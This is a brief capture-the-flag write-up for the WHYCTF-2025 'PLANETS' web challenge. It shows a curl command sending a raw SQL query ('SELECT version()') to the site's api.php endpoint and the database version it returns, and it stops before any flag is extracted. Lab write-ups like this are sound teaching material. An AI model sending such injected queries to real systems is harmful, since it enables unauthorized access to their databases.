Web
PLANETS
9/19/2025
by yeknom
WHYCTF-2025
WriteUp
PLANETS
π Description
I just started programming and created my first website, an overview of all the planets in our solar system. Can you check if I didn't leave any security issues in it?
π― Goal
- Find security issues in the planets website and extract the flag
π Given Files
- Website: https://planets.ctf.zone/
π οΈ Tools Used
curlbash
π‘ Walkthough
Inspected network/api calls and exploited SQL full query injection.
Try to check the version used:
curl -sk 'https://planets.ctf.zone/api.php' -X POST -H 'Content-Type: application/x-www-form-urlencoded' --data-urlencode 'query=SELECT version()'
[{"version()":"8.0.42-0ubuntu0.24.04.2"}]%